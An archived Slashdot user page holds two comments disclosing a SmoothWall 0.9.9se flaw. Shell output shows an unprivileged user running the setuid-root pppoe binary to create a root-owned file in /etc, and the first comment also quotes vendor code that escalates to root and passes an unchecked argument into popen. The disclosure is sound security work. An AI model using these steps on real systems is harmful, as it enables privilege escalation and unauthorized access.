Slashdot Mirror

← Back to Users

User: swuser

swuser's activity in the archive.

Stories
0
Comments
2
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 2

  1. Yet another smoothwall security hole on Slashback: SmoothWall, Gopher, Be · · Score: 5, Informative

    Just downloaded smoothwall 0.9.9se and had a search on google.

    bash$ id
    uid=99(nobody) gid=99(nobody) groups=99(nobody),14(smoothwa)
    bash$ ls -l /usr/sbin/pppoe
    -rwsr-x--- 1 root nobody 23888 Aug 6 12:36 /usr/sbin/pppoe
    bash$ /usr/sbin/pppoe -D /etc/test
    bash$ ls -l /etc/test
    -rw-rw-r-- 1 root nobody 367 Jan 10 03:11 /etc/test

    Though it's not surprising it's full of holes with code that the smoothwall people write:

    ...
    if (setgid(0)) { fprintf(stderr, "Couldn't set GID to 0\n"); return 0; }
    if (setuid(0)) { fprintf(stderr, "Couldn't set UID to 0\n"); return 0; }
    ...
    snprintf(command, STRING_SIZE - 1, "/var/patches/%s/setup", argv[1]);
    if (!(p = popen(command, "r")))
    return -1;

    etc. etc.
    It's full of setgid(0);setuid(0);system(command);
    absolutely unbelievable.

  2. security hole on SmoothWall Firewall Review · · Score: 1

    Just downloaded smoothwall 0.9.9se and had a search on google.

    bash$ id
    uid=99(nobody) gid=99(nobody) groups=99(nobody),14(smoothwa)
    bash$ ls -l /usr/sbin/pppoe
    -rwsr-x--- 1 root nobody 23888 Aug 6 12:36 /usr/sbin/pppoe
    bash$ /usr/sbin/pppoe -D /etc/test
    bash$ ls -l /etc/test
    -rw-rw-r-- 1 root nobody 367 Jan 10 03:11 /etc/test

    So much for security!